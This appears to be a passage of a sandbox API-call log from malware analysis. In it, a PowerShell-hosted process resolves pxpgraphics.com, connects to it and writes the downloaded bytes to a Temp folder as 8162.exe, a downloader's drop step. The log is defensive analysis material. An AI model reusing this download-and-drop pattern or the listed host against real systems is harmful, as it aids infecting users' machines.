lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0097.921] GetLastError () returned 0x3 [0097.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5fceaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0097.922] GetLastError () returned 0x3 [0097.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5fceaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0097.922] GetLastError () returned 0x3 [0097.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5fceaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0097.922] GetLastError () returned 0x3 [0098.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5fcec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0098.024] GetLastError () returned 0x3 [0098.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5fcec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0098.024] GetLastError () returned 0x3 [0098.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5fcec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0098.025] GetLastError () returned 0x3 [0098.286] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3702f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0098.286] GetLastError () returned 0xcb [0098.879] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0098.880] GetLastError () returned 0x2 [0098.880] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5fceffc | out: lpConsoleScreenBufferInfo=0x5fceffc) returned 1 [0098.880] GetLastError () returned 0x2 [0098.888] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0098.889] GetLastError () returned 0x2 [0098.889] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x5fceffc | out: lpConsoleScreenBufferInfo=0x5fceffc) returned 1 [0098.889] GetLastError () returned 0x2 [0098.899] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0098.899] GetLastError () returned 0x2 [0098.900] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x5fcefec | out: lpConsoleScreenBufferInfo=0x5fcefec) returned 1 [0098.900] GetLastError () returned 0x2 [0098.908] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0098.910] GetLastError () returned 0x2 [0098.910] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x5fcefec | out: lpConsoleScreenBufferInfo=0x5fcefec) returned 1 [0098.911] GetLastError () returned 0x2 [0098.918] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0098.919] GetLastError () returned 0x2 [0098.919] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x5fceff4 | out: lpConsoleScreenBufferInfo=0x5fceff4) returned 1 [0098.923] GetLastError () returned 0x2 [0098.926] SetConsoleTextAttribute (hConsoleOutput=0x1f, wAttributes=0x7) returned 1 [0098.927] GetLastError () returned 0x2 [0098.929] CloseHandle (hObject=0x1f) returned 1 [0098.929] GetLastError () returned 0x2 [0098.937] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0098.938] GetLastError () returned 0x2 [0098.938] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x5fceff4 | out: lpConsoleScreenBufferInfo=0x5fceff4) returned 1 [0098.938] GetLastError () returned 0x2 [0098.938] SetConsoleTextAttribute (hConsoleOutput=0x1f, wAttributes=0x7) returned 1 [0098.939] GetLastError () returned 0x2 [0098.939] CloseHandle (hObject=0x1f) returned 1 [0098.940] GetLastError () returned 0x2 [0098.940] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.940] GetLastError () returned 0x2 [0098.940] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x5fcf05c | out: lpMode=0x5fcf05c) returned 1 [0098.941] GetLastError () returned 0x2 [0098.948] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0098.949] GetLastError () returned 0x2 [0098.949] GetConsoleMode (in: hConsoleHandle=0x1f, lpMode=0x5fcf040 | out: lpMode=0x5fcf040) returned 1 [0098.950] GetLastError () returned 0x2 [0098.955] WriteConsoleW (in: hConsoleOutput=0x1f, lpBuffer=0x2ccce3c*, nNumberOfCharsToWrite=0x123, lpNumberOfCharsWritten=0x5fcf040, lpReserved=0x0 | out: lpBuffer=0x2ccce3c*, lpNumberOfCharsWritten=0x5fcf040*=0x123) returned 1 [0098.957] GetLastError () returned 0x2 [0098.958] CloseHandle (hObject=0x1f) returned 1 [0098.959] GetLastError () returned 0x2 [0098.966] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0098.968] GetLastError () returned 0x2 [0098.969] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x5fceff0 | out: lpConsoleScreenBufferInfo=0x5fceff0) returned 1 [0098.969] GetLastError () returned 0x2 [0098.969] SetConsoleTextAttribute (hConsoleOutput=0x1f, wAttributes=0x7) returned 1 [0098.973] GetLastError () returned 0x2 [0098.973] CloseHandle (hObject=0x1f) returned 1 [0098.974] GetLastError () returned 0x2 [0098.981] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0098.982] GetLastError () returned 0x2 [0098.983] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x5fceff0 | out: lpConsoleScreenBufferInfo=0x5fceff0) returned 1 [0098.983] GetLastError () returned 0x2 [0098.983] SetConsoleTextAttribute (hConsoleOutput=0x1f, wAttributes=0x7) returned 1 [0098.983] GetLastError () returned 0x2 [0098.984] CloseHandle (hObject=0x1f) returned 1 [0098.984] GetLastError () returned 0x2 [0098.993] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0098.993] GetLastError () returned 0x2 [0098.993] GetConsoleMode (in: hConsoleHandle=0x1f, lpMode=0x5fcf0e4 | out: lpMode=0x5fcf0e4) returned 1 [0098.994] GetLastError () returned 0x2 [0098.994] WriteConsoleW (in: hConsoleOutput=0x1f, lpBuffer=0x2a59f4c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5fcf0e4, lpReserved=0x0 | out: lpBuffer=0x2a59f4c*, lpNumberOfCharsWritten=0x5fcf0e4*=0x1) returned 1 [0098.994] GetLastError () returned 0x2 [0098.994] CloseHandle (hObject=0x1f) returned 1 [0098.995] GetLastError () returned 0x2 [0098.995] GetLongPathNameW (in: lpszShortPath="C:\\Users\\HJRD1K~1\\", lpszLongPath=0x5fcec54, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\hJrD1KOKY DS8lUjv\\") returned 0x1b [0098.997] GetLastError () returned 0x2 [0098.997] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", nBufferLength=0x105, lpBuffer=0x5fcec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", lpFilePart=0x0) returned 0x36 [0098.997] GetLastError () returned 0x2 [0098.997] SetErrorMode (uMode=0x1) returned 0x1 [0098.997] CreateFileW (lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe" (normalized: "c:\\users\\hjrd1koky ds8lujv\\appdata\\local\\temp\\8162.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x57c [0098.998] GetLastError () returned 0xb7 [0098.998] GetFileType (hFile=0x57c) returned 0x1 [0098.998] SetErrorMode (uMode=0x1) returned 0x1 [0098.998] GetFileType (hFile=0x57c) returned 0x1 [0098.998] SetEvent (hEvent=0x428) returned 1 [0098.998] GetLastError () returned 0xb7 [0099.001] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x58c [0099.001] GetLastError () returned 0x0 [0099.001] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5a8 [0099.002] GetLastError () returned 0x0 [0099.002] getaddrinfo (in: pNodeName="pxpgraphics.com", pServiceName=0x0, pHints=0x5fceed8*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5fcec6c | out: ppResult=0x5fcec6c*=0x6440268*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="pxpgraphics.com", ai_addr=0x6454ee8*(sa_family=2, sin_port=0x0, sin_addr="69.65.3.206"), ai_next=0x0)) returned 0 [0099.291] GetLastError () returned 0x0 [0099.292] FreeAddrInfoW (pAddrInfo=0x6440268*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="硰杰慲桰捩⹳潣m", ai_addr=0x6454ee8*(sa_family=2, sin_port=0x0, sin_addr="69.65.3.206"), ai_next=0x0)) [0099.292] GetLastError () returned 0x0 [0099.296] WSAConnect (in: s=0x58c, name=0x2d095a0*(sa_family=2, sin_port=0x50, sin_addr="69.65.3.206"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0099.440] GetLastError () returned 0x0 [0099.440] closesocket (s=0x5a8) returned 0 [0099.440] GetLastError () returned 0x0 [0099.440] send (in: s=0x58c, buf=0x2d09764*, len=74, flags=0 | out: buf=0x2d09764*) returned 74 [0099.441] GetLastError () returned 0x0 [0099.441] setsockopt (s=0x58c, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0099.441] GetLastError () returned 0x0 [0099.441] recv (in: s=0x58c, buf=0x2d08180, len=4096, flags=0 | out: buf=0x2d08180*) returned 4096 [0100.123] GetLastError () returned 0x0 [0100.128] setsockopt (s=0x58c, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0100.128] GetLastError () returned 0x0 [0100.134] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 3164 [0100.134] GetLastError () returned 0x0 [0100.134] WriteFile (in: hFile=0x57c, lpBuffer=0x2d1a23c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d1a23c*, lpNumberOfBytesWritten=0x5fcf184*=0x1000, lpOverlapped=0x0) returned 1 [0100.135] GetLastError () returned 0x0 [0100.135] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 4356 [0100.264] GetLastError () returned 0x0 [0100.264] WriteFile (in: hFile=0x57c, lpBuffer=0x2d1a23c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d1a23c*, lpNumberOfBytesWritten=0x5fcf184*=0x1000, lpOverlapped=0x0) returned 1 [0100.265] GetLastError () returned 0x0 [0100.265] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 1452 [0100.265] GetLastError () returned 0x0 [0100.265] WriteFile (in: hFile=0x57c, lpBuffer=0x2d1a23c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d1a23c*, lpNumberOfBytesWritten=0x5fcf184*=0x1000, lpOverlapped=0x0) returned 1 [0100.265] GetLastError () returned 0x0 [0100.265] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 5808 [0100.408] GetLastError () returned 0x0 [0100.408] WriteFile (in: hFile=0x57c, lpBuffer=0x2d1a23c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d1a23c*, lpNumberOfBytesWritten=0x5fcf184*=0x1000, lpOverlapped=0x0) returned 1 [0100.408] GetLastError () returned 0x0 [0100.409] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 1452 [0100.409] GetLastError () returned 0x0 [0100.409] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 7260 [0100.550] GetLastError () returned 0x0 [0100.550] WriteFile (in: hFile=0x57c, lpBuffer=0x2d1a23c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d1a23c*, lpNumberOfBytesWritten=0x5fcf184*=0x1000, lpOverlapped=0x0) returned 1 [0100.551] GetLastError () returned 0x0 [0100.551] WriteFile (in: hFile=0x57c, lpBuffer=0x2d0a440*, nNumberOfBytesToWrite=0x1a34, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d0a440*, lpNumberOfBytesWritten=0x5fcf184*=0x1a34, lpOverlapped=0x0) returned 1 [0100.552] GetLastError () returned 0x0 [0100.552] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 2904 [0100.553] GetLastError () returned 0x0 [0100.553] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 10164 [0100.712] GetLastError () returned 0x0 [0100.713] WriteFile (in: hFile=0x57c, lpBuffer=0x2d1a23c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d1a23c*, lpNumberOfBytesWritten=0x5fcf184*=0x1000, lpOverlapped=0x0) returned 1 [0100.713] GetLastError () returned 0x0 [0100.713] WriteFile (in: hFile=0x57c, lpBuffer=0x2d0a6c0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d0a6c0*, lpNumberOfBytesWritten=0x5fcf184*=0x230c, lpOverlapped=0x0) returned 1 [0100.716] GetLastError () returned 0x0 [0100.716] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 2904 [0100.716] GetLastError () returned 0x0 [0100.716] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 13068 [0100.838] GetLastError () returned 0x0 [0100.838] WriteFile (in: hFile=0x57c, lpBuffer=0x2d1a23c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d1a23c*, lpNumberOfBytesWritten=0x5fcf184*=0x1000, lpOverlapped=0x0) returned 1 [0100.839] GetLastError () returned 0x0 [0100.839] WriteFile (in: hFile=0x57c, lpBuffer=0x2d0a6c0*, nNumberOfBytesToWrite=0x2e64, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d0a6c0*, lpNumberOfBytesWritten=0x5fcf184*=0x2e64, lpOverlapped=0x0) returned 1 [0100.839] GetLastError () returned 0x0 [0100.840] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 1452 [0100.840] GetLastError () returned 0x0 [0100.840] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 15972 [0100.981] GetLastError () returned 0x0 [0100.981] WriteFile (in: hFile=0x57c, lpBuffer=0x2d1a23c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d1a23c*, lpNumberOfBytesWritten=0x5fcf184*=0x1000, lpOverlapped=0x0) returned 1 [0100.982] GetLastError () returned 0x0 [0100.982] WriteFile (in: hFile=0x57c, lpBuffer=0x2d0ac6c*, nNumberOfBytesToWrite=0x3410, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d0ac6c*, lpNumberOfBytesWritten=0x5fcf184*=0x3410, lpOverlapped=0x0) returned 1 [0100.982] GetLastError () returned 0x0 [0100.983] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 4356 [0100.983] GetLastError () returned 0x0 [0100.983] WriteFile (in: hFile=0x57c, lpBuffer=0x2d0a218*, nNumberOfBytesToWrite=0x1104, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d0a218*, lpNumberOfBytesWritten=0x5fcf184*=0x1104, lpOverlapped=0x0) returned 1 [0100.983] GetLastError () returned 0x0 [0100.984] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 18876 [0101.125] GetLastError () returned 0x0 [0101.125] WriteFile (in: hFile=0x57c, lpBuffer=0x2d0a218*, nNumberOfBytesToWrite=0x49bc, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d0a218*, lpNumberOfBytesWritten=0x5fcf184*=0x49bc, lpOverlapped=0x0) returned 1 [0101.126] GetLastError () returned 0x0 [0101.126] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 2904 [0101.126] GetLastError () returned 0x0 [0101.126] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 26136 [0101.267] GetLastError () returned 0x0 [0101.268] WriteFile (in: hFile=0x57c, lpBuffer=0x2d1a23c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d1a23c*, lpNumberOfBytesWritten=0x5fcf184*=0x1000, lpOverlapped=0x0) returned 1 [0101.268] GetLastError () returned 0x0 [0101.269] WriteFile (in: hFile=0x57c, lpBuffer=0x2d0a6c0*, nNumberOfBytesToWrite=0x6170, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d0a6c0*, lpNumberOfBytesWritten=0x5fcf184*=0x6170, lpOverlapped=0x0) returned 1 [0101.270] GetLastError () returned 0x0 [0101.270] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 8712 [0101.271] GetLastError () returned 0x0 [0101.271] WriteFile (in: hFile=0x57c, lpBuffer=0x2d0a218*, nNumberOfBytesToWrite=0x2208, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d0a218*, lpNumberOfBytesWritten=0x5fcf184*=0x2208, lpOverlapped=0x0) returned 1 [0101.271] GetLastError () returned 0x0 [0101.271] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 3472 [0101.405] GetLastError () returned 0x0 [0101.405] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 6692 [0101.406] GetLastError () returned 0x0 [0101.408] WriteFile (in: hFile=0x57c, lpBuffer=0x2d1a23c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d1a23c*, lpNumberOfBytesWritten=0x5fcf184*=0x1000, lpOverlapped=0x0) returned 1 [0101.410] GetLastError () returned 0x0 [0101.411] WriteFile (in: hFile=0x57c, lpBuffer=0x2d0a488*, nNumberOfBytesToWrite=0x17b4, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d0a488*, lpNumberOfBytesWritten=0x5fcf184*=0x17b4, lpOverlapped=0x0) returned 1 [0101.412] GetLastError () returned 0x0 [0101.412] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 40656 [0101.414] GetLastError () returned 0x0 [0101.415] WriteFile (in: hFile=0x57c, lpBuffer=0x2d0a218*, nNumberOfBytesToWrite=0x9ed0, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d0a218*, lpNumberOfBytesWritten=0x5fcf184*=0x9ed0, lpOverlapped=0x0) returned 1 [0101.420] GetLastError () returned 0x0 [0101.420] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 1452 [0101.420] GetLastError () returned 0x0 [0101.420] recv (in: s=0x58c, buf=0x2d0a218, len=65536, flags=0 | out: buf=0x2d0a218*) returned 30492 [0101.559] GetLastError () returned 0x0 [0101.559] WriteFile (in: hFile=0x57c, lpBuffer=0x2d1a23c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d1a23c*, lpNumberOfBytesWritten=0x5fcf184*=0x1000, lpOverlapped=0x0) returned 1 [0101.560] GetLastError () returned 0x0 [0101.560] WriteFile (in: hFile=0x57c, lpBuffer=0x2d0ac6c*, nNumberOfBytesToWrite=0x6cc8, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d0ac6c*, lpNumberOfBytesWritten=0x5fcf184*=0x6cc8, lpOverlapped=0x0) returned 1 [0101.561] GetLastError () returned 0x0 [0101.561] recv (in: s=0x58c, buf=0x2d0a218, len=60616, flags=0 | out: buf=0x2d0a218*) returned 24684 [0101.562] GetLastError () returned 0x0 [0101.562] WriteFile (in: hFile=0x57c, lpBuffer=0x2d0a218*, nNumberOfBytesToWrite=0x606c, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d0a218*, lpNumberOfBytesWritten=0x5fcf184*=0x606c, lpOverlapped=0x0) returned 1 [0101.563] GetLastError () returned 0x0 [0101.563] recv (in: s=0x58c, buf=0x2d0a218, len=35932, flags=0 | out: buf=0x2d0a218*) returned 4356 [0101.564] GetLastError () returned 0x0 [0101.564] WriteFile (in: hFile=0x57c, lpBuffer=0x2d0a218*, nNumberOfBytesToWrite=0x1104, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d0a218*, lpNumberOfBytesWritten=0x5fcf184*=0x1104, lpOverlapped=0x0) returned 1 [0101.564] GetLastError () returned 0x0 [0101.564] recv (in: s=0x58c, buf=0x2d0a218, len=31576, flags=0 | out: buf=0x2d0a218*) returned 27588 [0101.704] GetLastError () returned 0x0 [0101.704] WriteFile (in: hFile=0x57c, lpBuffer=0x2d0a218*, nNumberOfBytesToWrite=0x6bc4, lpNumberOfBytesWritten=0x5fcf184, lpOverlapped=0x0 | out: lpBuffer=0x2d0a218*, lpNumberOfBytesWritten=0x5fcf184*=0x6bc4, lpOverlapped=0x0) returned 1 [0101.706] GetLastError () returned 0x0 [0101.706] recv (in: s=0x58c, buf=0x2d0a218, len=3988, flags=0 | out: buf=0x2d0a218*) returned 3988 [0101.707] GetLastError () returned 0x0 [0101.707] recv (in: s=0x58c, buf=0x2d0a13c, len=2, flags=0 | out: buf=0x2d0a13c*) returned 2 [0101.707] GetLastError () returned 0x0 [0101.707] recv (in: s=0x58c, buf=0x2d0a13c, len=1, flags=0 | out: buf=0x2d0a13c*) returned 1 [0101.707] GetLastError () returned 0x0 [0101.707] recv (in: s=0x58c, buf=0x2d0a13c, len=1, flags=0 | out: buf=0x2d0a13c*) returned 1 [0101.707] GetLastError () returned 0x0 [0101.708] recv (in: s=0x58c, buf=0x2d0a13c, len=1, flags=0 | out: buf=0x2d0a13c*) returned 1 [0101.708] GetLastError () returned 0x0 [0101.708] recv (in: s=0x58c, buf=0x2d0a13c, len=2, flags=0 | out: buf=0x2d0a13c*) returned 2 [0101.708] GetLastError () returned 0x0 [0101.708] WriteFile (in: hFile=0x57c, lpBuffer=0x2d1a23c*, nNumberOfBytesToWrite=0xf94, lpNumberOfBytesWritten=0x5fcf158, lpOverlapped=0x0 | out: lpBuffer=0x2d1a23c*, lpNumberOfBytesWritten=0x5fcf158*=0xf94, lpOverlapped=0x0) returned 1 [0101.709] GetLastError () returned 0x0 [0101.709] CloseHandle (hObject=0x57c) returned 1 [0101.719] GetLastError () returned 0x0 [0101.724] GetLongPathNameW (in: lpszShortPath="C:\\Users\\HJRD1K~1\\", lpszLongPath=0x5fce950, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\hJrD1KOKY DS8lUjv\\") returned 0x1b [0101.726] GetLastError () returned 0x0 [0101.726] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", nBufferLength=0x105, lpBuffer=0x5fce978, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", lpFilePart=0x0) returned 0x36 [0101.726] GetLastError () returned 0x0 [0101.726] SetErrorMode (uMode=0x1) returned 0x1 [0101.726] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", fInfoLevelId=0x0, lpFileInformation=0x2d2570c | out: lpFileInformation=0x2d2570c) returned 1 [0101.726] GetLastError () returned 0x0 [0101.727] SetErrorMode (uMode=0x1) returned 0x1 [0101.728] GetLongPathNameW (in: lpszShortPath="C:\\Users\\HJRD1K~1\\", lpszLongPath=0x5fcec38, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\hJrD1KOKY DS8lUjv\\") returned 0x1b [0101.732] GetLastError () returned 0x0 [0101.732] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", nBufferLength=0x105, lpBuffer=0x5fcec60, lpFilePart=0x0 | out: 